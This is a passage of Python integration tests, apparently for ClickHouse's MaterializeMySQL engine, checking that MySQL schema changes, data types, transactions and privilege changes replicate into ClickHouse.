clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialize_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def drop_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database.test_table_1;")
mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def create_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def rename_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database.test_table_1 TO test_database.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database.test_table_2 TO test_database.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def alter_add_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql1" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql1" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql1" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def alter_drop_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def alter_rename_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def alter_modify_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialize_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column, RENAME TO test_database.test_table_2, RENAME TO test_database.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column, RENAME TO test_database.test_table_2, RENAME TO test_database.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializeMySQL('{}:3306', 'db', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a=2;")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert clickhouse_node.query("SELECT count(_version) FROM db.t FORMAT TSV") == res[2]
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializeMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='DROP'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='DROP'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
